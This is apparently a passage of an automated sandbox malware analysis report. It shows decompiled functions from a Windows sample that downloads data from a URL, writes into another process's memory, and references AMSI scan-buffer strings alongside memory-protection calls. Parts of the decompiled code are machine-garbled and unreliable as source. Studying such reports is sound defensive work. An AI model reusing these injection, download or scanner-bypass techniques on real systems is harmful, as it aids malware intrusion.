                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                • GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                • RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                • GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                • NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                • FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryMemory$AddressCurrentFlushFreeHandleLoadModuleMoveProcProcessVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 1189176514-0
                                                                                                • Opcode ID: 92cb3cd448ff88a763736dbfc6c0c735f55e659dc6f6394fe175ce9cc4660d55
                                                                                                • Instruction ID: cb77fdb31bf453472d24bba1e1afbb7cc0208f90c1af4f17046e021e083dc536
                                                                                                • Opcode Fuzzy Hash: 92cb3cd448ff88a763736dbfc6c0c735f55e659dc6f6394fe175ce9cc4660d55
                                                                                                • Instruction Fuzzy Hash: 9C1190B0AC0604AEEB10FBA8D985E5EB7FDFB85B00F9508F4E060E3250DB349981CE54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02188CBC Relevance: 7.6, APIs: 5, Instructions: 97networkfileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 60%
                                                                                                			E02188CBC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				char _v8;
				void* _t14;
				char* _t20;
				void* _t21;
				void* _t22;
				void* _t24;
				void* _t27;
				void* _t34;
				void* _t37;
				long _t43;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t56;
				intOrPtr _t57;

				_t56 = _t57;
				_push(0);
				_t37 = __edx;
				_t54 = __eax;
				_push(_t56);
				_push(0x2188df7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t57;
				E021748A0(__edx);
				E0217304C(0x64);
				E02177C4C( &_v8);
				_t14 = InternetOpenA(E02174D64(_v8), 1, 0, 0, 0); // executed
				 *0x21945b0 = _t14;
				if( *0x21945b0 == 0) {
					__eflags = 0;
					_pop(_t48);
					 *[fs:eax] = _t48;
					_push(E02188DFE);
					return E021748A0( &_v8);
				} else {
					_push(_t56);
					_push(0x2188dda);
					_push( *[fs:eax]);
					 *[fs:eax] = _t57;
					_t20 = E02174D64(_t54);
					_t21 =  *0x21945b0; // 0xcc0004
					_t22 = InternetOpenUrlA(_t21, _t20, 0, 0, 0, 0); // executed
					 *0x21945b4 = _t22;
					if( *0x21945b4 == 0) {
						__eflags = 0;
						_pop(_t49);
						 *[fs:eax] = _t49;
						_push(0x2188de1);
						_t24 =  *0x21945b0; // 0xcc0004
						return InternetCloseHandle(_t24);
					} else {
						_push(_t56);
						_push(0x2188dba);
						_push( *[fs:eax]);
						 *[fs:eax] = _t57;
						do {
							_t27 =  *0x21945b4; // 0xcc000c
							InternetReadFile(_t27, 0x21945b8, 0x401, 0x21949bc); // executed
							_t43 =  *0x21949bc; // 0x0
							E02174990(0x2194b70, _t43, 0x21945b8, 0);
							_t51 =  *0x2194b70; // 0x0
							E02174B6C(_t37, _t51);
						} while ( *0x21949bc != 0);
						_pop(_t52);
						 *[fs:eax] = _t52;
						_push(0x2188dc1);
						_t34 =  *0x21945b4; // 0xcc000c
						return InternetCloseHandle(_t34);
					}
				}
			}




















                                                                                                0x02188cbd
                                                                                                0x02188cbf
                                                                                                0x02188cc3
                                                                                                0x02188cc5
                                                                                                0x02188cc9
                                                                                                0x02188cca
                                                                                                0x02188ccf
                                                                                                0x02188cd2
                                                                                                0x02188cd7
                                                                                                0x02188ce9
                                                                                                0x02188cf2
                                                                                                0x02188d00
                                                                                                0x02188d05
                                                                                                0x02188d11
                                                                                                0x02188de1
                                                                                                0x02188de3
                                                                                                0x02188de6
                                                                                                0x02188de9
                                                                                                0x02188df6
                                                                                                0x02188d17
                                                                                                0x02188d19
                                                                                                0x02188d1a
                                                                                                0x02188d1f
                                                                                                0x02188d22
                                                                                                0x02188d2f
                                                                                                0x02188d35
                                                                                                0x02188d3b
                                                                                                0x02188d40
                                                                                                0x02188d4c
                                                                                                0x02188dc1
                                                                                                0x02188dc3
                                                                                                0x02188dc6
                                                                                                0x02188dc9
                                                                                                0x02188dce
                                                                                                0x02188dd9
                                                                                                0x02188d4e
                                                                                                0x02188d50
                                                                                                0x02188d51
                                                                                                0x02188d56
                                                                                                0x02188d59
                                                                                                0x02188d5c
                                                                                                0x02188d6b
                                                                                                0x02188d71
                                                                                                0x02188d80
                                                                                                0x02188d86
                                                                                                0x02188d8d
                                                                                                0x02188d93
                                                                                                0x02188d98
                                                                                                0x02188da3
                                                                                                0x02188da6
                                                                                                0x02188da9
                                                                                                0x02188dae
                                                                                                0x02188db9
                                                                                                0x02188db9
                                                                                                0x02188d4c

                                                                                                APIs
                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02188D00
                                                                                                • InternetOpenUrlA.WININET(00CC0004,00000000,00000000,00000000,00000000,00000000), ref: 02188D3B
                                                                                                • InternetReadFile.WININET(00CC000C,021945B8,00000401,021949BC), ref: 02188D71
                                                                                                • InternetCloseHandle.WININET(00CC000C), ref: 02188DB4
                                                                                                • InternetCloseHandle.WININET(00CC0004), ref: 02188DD4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 3121278467-0
                                                                                                • Opcode ID: 8f4eb6201f44d7dbeb3d9d5cea762be6964d42a1e4f195fb1b1fe3c0f1fd9853
                                                                                                • Instruction ID: 01885ef94c2c693dee2d8d345ff2637200d48136a13b93734e56da5271fb7f01
                                                                                                • Opcode Fuzzy Hash: 8f4eb6201f44d7dbeb3d9d5cea762be6964d42a1e4f195fb1b1fe3c0f1fd9853
                                                                                                • Instruction Fuzzy Hash: 043169307C4344AFFB21AFA4EC52B1677FAE789B00F920865F501D6680E7B6AC118E54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02185AD8 Relevance: 3.0, APIs: 2, Instructions: 26memoryinjectionCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E02185AD8(void* __eax, long __ecx, void* __edx) {
				void* _t2;
				void* _t5;
				void* _t8;
				long _t9;
				void* _t10;

				_t9 = __ecx;
				_t10 = __edx;
				_t5 = __eax;
				_t2 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40); // executed
				_t8 = _t2;
				WriteProcessMemory(_t5, _t8, _t10, _t9, 0x2194518); // executed
				return _t8;
			}








                                                                                                0x02185adc
                                                                                                0x02185ade
                                                                                                0x02185ae0
                                                                                                0x02185aed
                                                                                                0x02185af2
                                                                                                0x02185afd
                                                                                                0x02185b08

                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,02185B24), ref: 02185AED
                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,02194518,?,00000000,?,00003000,00000040,?,?,?,?,02185B24), ref: 02185AFD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                                                • String ID:
                                                                                                • API String ID: 645232735-0
                                                                                                • Opcode ID: e8f917549ecb17e5641522b2d64e6cd1780c37ce080391dd8b07f7b132c1a630
                                                                                                • Instruction ID: 3417015de3e602fc12fe51aa77fc597d73315881462e9a6d18da19696eb1f369
                                                                                                • Opcode Fuzzy Hash: e8f917549ecb17e5641522b2d64e6cd1780c37ce080391dd8b07f7b132c1a630
                                                                                                • Instruction Fuzzy Hash: 0DD0A7623C23683BF534207B2C45F676E9DCBC6BB2E1100327708E6181D9D1AC0080F8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02185770 Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E02185770(int __eax, int __edx) {
				void* _t4;
				int _t5;

				_t5 = __eax;
				if(E021854F4() == 0) {
					return 0;
				} else {
					_t4 = CreateToolhelp32Snapshot(_t5, __edx); // executed
					return _t4;
				}
			}





                                                                                                0x02185774
                                                                                                0x0218577d
                                                                                                0x0218578e
                                                                                                0x0218577f
                                                                                                0x02185781
                                                                                                0x02185789
                                                                                                0x02185789

                                                                                                APIs
                                                                                                  • Part of subcall function 021854F4: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0218577B,?,?,0218580D,00000000,021858E9), ref: 02185508
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02185520
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02185532
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02185544
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02185556
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02185568
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0218557A
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0218558C
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0218559E
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 021855B0
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 021855C2
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 021855D4
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 021855E6
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Module32First), ref: 021855F8
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0218560A
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0218561C
                                                                                                  • Part of subcall function 021854F4: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0218562E
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02185781
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 2242398760-0
                                                                                                • Opcode ID: 0abcb422dce6d9b1aa492d06f666234b4ba704d8e6d3688766503f79b61f3e96
                                                                                                • Instruction ID: 57e1ef44aefa75d278cd122430e805bbae97a0e1bd116876a39e29339d58bc61
                                                                                                • Opcode Fuzzy Hash: 0abcb422dce6d9b1aa492d06f666234b4ba704d8e6d3688766503f79b61f3e96
                                                                                                • Instruction Fuzzy Hash: 4FC080726411206BCB1075F83CC84C3478DDE491BB3450462B509E3102D7154C115990
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0218634C Relevance: 32.6, APIs: 11, Strings: 7, Instructions: 1131COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3890 218634c-2186350 3891 21863bb-21863ce call 217304c InetIsOffline 3890->3891 3892 2186352 3890->3892 3895 21863de-21863e0 3891->3895 3896 21863d0-21863dc call 21748f4 3891->3896 3892->3891 3897 21863ea-2186a9f call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 VirtualAlloc call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 217cac8 GetProcAddress FreeLibrary VirtualAlloc call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2185df0 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 LoadLibraryA GetProcAddress VirtualProtect call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 3895->3897 3898 21863e5 call 21748f4 3895->3898 3896->3897 4103 2186ef5-2187214 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2175a04 3897->4103 4104 2186aa5-2186aa6 3897->4104 3898->3897 4279 2187216-2187282 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 4103->4279 4280 2187287-21873fc call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2185e2c call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 4103->4280 4106 2186aac-2186bbd call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 4104->4106 4164 2186bc3-2186cc0 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 4106->4164 4165 2186cc6-2186eef call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 VirtualAlloc call 2173518 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2185df0 4106->4165 4164->4165 4165->4103 4165->4106 4279->4280 4355 21873fe-2187415 call 2185f6c 4280->4355 4356 2187416-2187504 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 4280->4356 4355->4356 4387 218750a-218750b 4356->4387 4388 218764d-218768d call 21755fc call 21748c4 * 2 4356->4388 4389 2187511-2187647 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2185dd8 VirtualProtect FreeLibrary 4387->4389 4389->4388
                                                                                                C-Code - Quality: 39%
                                                                                                			E0218634C() {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v117;
				intOrPtr* _t12;
				intOrPtr* _t13;
				void* _t14;
				signed int _t15;
				signed int _t19;
				void* _t21;
				void* _t22;
				intOrPtr _t23;
				void* _t28;
				void* _t29;
				signed int _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t36;

				_t13 = _t12 +  *_t12;
				 *_t13 =  *_t13 + _t13;
				if( *_t13 >= 0) {
					L8:
					 *(_t13 + 0x270e) =  *(_t13 + 0x270e) & 0x02194598;
					_t14 = E0217304C(_t13);
					_push(_t14);
					L021858FC();
					if(_t14 == 0) {
						_t15 = 0x2194598;
						L11:
						asm("sbb [edx], al");
						E021748F4(_t15, 0x21876b8);
						L12:
						L13:
						_push(0x21876c4);
					}
					L9:
					E021748F4(0x2194598, 0x21876a8);
					goto L13;
				}
				 *_t13 =  *_t13 + _t13;
				asm("invalid");
				asm("invalid");
				_t19 = _t13 +  *_t13;
				 *_t19 =  *_t19 + _t19;
				_t22 = _t21 + 1;
				asm("insd");
				 *_t19 =  *_t19 + _t19;
				asm("invalid");
				asm("invalid");
				_t15 = _t19 |  *_t19;
				 *_t15 =  *_t15 + _t15;
				_t29 = _t28 - 1;
				_t36 = _t29;
				if(_t36 < 0) {
					goto L9;
				}
				asm("outsb");
				_push(0x2194598);
				if(_t36 >= 0) {
					goto L11;
				}
				_t32 =  *(_t29 + 0x6e) * 0xffffff00;
				 *0x21876b8 =  *0x21876b8 - 1;
				 *_t15 =  *_t15 + _t15;
				 *0x021945FB =  *((intOrPtr*)(0x21945fb)) + 0x21876b8;
				asm("popad");
				asm("outsb");
				if(0x21876b9 != 0) {
					goto L12;
				}
				asm("o16 jb 0x4");
				_v117 = _v117 + 0x21876b9;
				_push(_t32);
				_t33 = _t34;
				_push(_t22);
				_t23 = 0x47;
				do {
					_push(0);
					_push(0);
					_t23 = _t23 - 1;
				} while (_t23 != 0);
				_t6 =  &_v8;
				 *_t6 = _t23;
				_push(0x2194598);
				_push(_t29);
				_v12 =  *_t6;
				_v8 = _t15;
				_t13 = 0;
				_push(_t33);
				_push(0x218768e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t34;
				goto L8;
			}




















                                                                                                0x0218634c
                                                                                                0x0218634e
                                                                                                0x02186350
                                                                                                0x021863bb
                                                                                                0x021863bb
                                                                                                0x021863c1
                                                                                                0x021863c6
                                                                                                0x021863c7
                                                                                                0x021863ce
                                                                                                0x021863de
                                                                                                0x021863e3
                                                                                                0x021863e3
                                                                                                0x021863e5
                                                                                                0x021863e9
                                                                                                0x021863ea
                                                                                                0x021863ea
                                                                                                0x021863ea
                                                                                                0x021863d0
                                                                                                0x021863d7
                                                                                                0x00000000
                                                                                                0x021863d7
                                                                                                0x02186352
                                                                                                0x02186354
                                                                                                0x02186356
                                                                                                0x02186358
                                                                                                0x0218635a
                                                                                                0x0218635c
                                                                                                0x0218635d
                                                                                                0x0218635e
                                                                                                0x02186360
                                                                                                0x02186362
                                                                                                0x02186364
                                                                                                0x02186366
                                                                                                0x02186368
                                                                                                0x02186368
                                                                                                0x02186369
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0218636b
                                                                                                0x0218636c
                                                                                                0x0218636d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02186370
                                                                                                0x02186377
                                                                                                0x02186379
                                                                                                0x0218637b
                                                                                                0x0218637e
                                                                                                0x0218637f
                                                                                                0x02186381
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02186383
                                                                                                0x02186387
                                                                                                0x02186388
                                                                                                0x02186389
                                                                                                0x0218638b
                                                                                                0x0218638c
                                                                                                0x02186391
                                                                                                0x02186391
                                                                                                0x02186393
                                                                                                0x02186395
                                                                                                0x02186395
                                                                                                0x02186398
                                                                                                0x02186398
                                                                                                0x0218639b
                                                                                                0x0218639d
                                                                                                0x0218639e
                                                                                                0x021863a1
                                                                                                0x021863ae
                                                                                                0x021863b0
                                                                                                0x021863b1
                                                                                                0x021863b6
                                                                                                0x021863b9
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,0218768E,?,?,?,?,00000000,00000000), ref: 021863C7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: InetOffline
                                                                                                • String ID: OpenSession$ScanBuffer$UacScan$VirtualAlloc$VirtualProtect$kernel32$teSe
                                                                                                • API String ID: 3180263700-2221745942
                                                                                                • Opcode ID: 9c5fe72c77ae050e8ad31589976df1fcd5059f7d5a0af21372b7b10d9168a1c7
                                                                                                • Instruction ID: f6dc334c6bc0c138fbbd3a8aeb97f9d1eee7e08e779a92020755f75034216392
                                                                                                • Opcode Fuzzy Hash: 9c5fe72c77ae050e8ad31589976df1fcd5059f7d5a0af21372b7b10d9168a1c7
                                                                                                • Instruction Fuzzy Hash: B6A2FF39AC01199FEB21FB64D8C4EDEB7F6AF85700F2044E6A405AB254DB30AE46CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02171754 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 6208 2171754-2171766 6209 217176c-217177c 6208->6209 6210 2171998-217199d 6208->6210 6211 21717d4-21717dd 6209->6211 6212 217177e-217178b 6209->6212 6213 21719a3-21719b4 6210->6213 6214 2171ab0-2171ab3 6210->6214 6211->6212 6221 21717df-21717eb 6211->6221 6217 21717a4-21717b0 6212->6217 6218 217178d-217179a 6212->6218 6219 21719b6-21719d2 6213->6219 6220 2171968-2171975 6213->6220 6215 21716b4-21716dd VirtualAlloc 6214->6215 6216 2171ab9-2171abb 6214->6216 6227 217170f-2171715 6215->6227 6228 21716df-217170c call 2171674 6215->6228 6225 21717b2-21717c0 6217->6225 6226 2171820-2171829 6217->6226 6222 21717c4-21717d1 6218->6222 6223 217179c-21717a0 6218->6223 6229 21719d4-21719dc 6219->6229 6230 21719e0-21719ef 6219->6230 6220->6219 6224 2171977-217198b Sleep 6220->6224 6221->6212 6231 21717ed-21717f9 6221->6231 6224->6219 6237 217198d-2171994 Sleep 6224->6237 6235 217185c-2171866 6226->6235 6236 217182b-2171838 6226->6236 6228->6227 6239 2171a3c-2171a52 6229->6239 6232 21719f1-2171a05 6230->6232 6233 2171a08-2171a10 6230->6233 6231->6212 6234 21717fb-217180e Sleep 6231->6234 6232->6239 6242 2171a12-2171a2a 6233->6242 6243 2171a2c-2171a2e call 21715fc 6233->6243 6234->6212 6241 2171814-217181b Sleep 6234->6241 6245 21718d8-21718e4 6235->6245 6246 2171868-2171893 6235->6246 6236->6235 6244 217183a-217184e Sleep 6236->6244 6237->6220 6247 2171a54-2171a62 6239->6247 6248 2171a6b-2171a77 6239->6248 6241->6211 6249 2171a33-2171a3b 6242->6249 6243->6249 6244->6235 6251 2171850-2171857 Sleep 6244->6251 6257 21718e6-21718f8 6245->6257 6258 217190c-217191b call 21715fc 6245->6258 6252 2171895-21718a3 6246->6252 6253 21718ac-21718ba 6246->6253 6247->6248 6254 2171a64 6247->6254 6255 2171a79-2171a8c 6248->6255 6256 2171a98 6248->6256 6251->6236 6252->6253 6262 21718a5 6252->6262 6263 21718bc-21718d6 call 2171530 6253->6263 6264 2171928 6253->6264 6254->6248 6265 2171a8e-2171a93 call 2171530 6255->6265 6266 2171a9d-2171aaf 6255->6266 6256->6266 6259 21718fc-217190a 6257->6259 6260 21718fa 6257->6260 6267 217192d-2171966 6258->6267 6271 217191d-2171927 6258->6271 6259->6267 6260->6259 6262->6253 6263->6267 6264->6267 6265->6266
                                                                                                C-Code - Quality: 67%
                                                                                                			E02171754(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t129 =  *0x2191045; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E02171674();
								_t99 =  *0x21937a8; // 0x7f9f0000
								 *_t147 = 0x21937a4;
								 *0x21937a8 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x21937a0 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x2191710], ah");
								if(__eflags == 0) {
									goto L39;
								}
								Sleep(0);
								asm("lock cmpxchg [0x2191710], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									continue;
								}
								goto L39;
							}
						}
						L39:
						_t141 = _t125 - 0xb30;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x2191720 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x219171c;
							if((0xfffffffe << _t132 &  *0x219171c) == 0) {
								_t133 =  *0x2191718; // 0x4fcd0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E021715FC(_t125);
								} else {
									_t110 =  *0x2191714; // 0x4a7fce0
									_t109 = _t110 - _t125;
									 *0x2191714 = _t109;
									 *0x2191718 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x2191710 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L47;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L47:
							_push(_t152);
							_push(_t145);
							_t148 = 0x21917a0 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
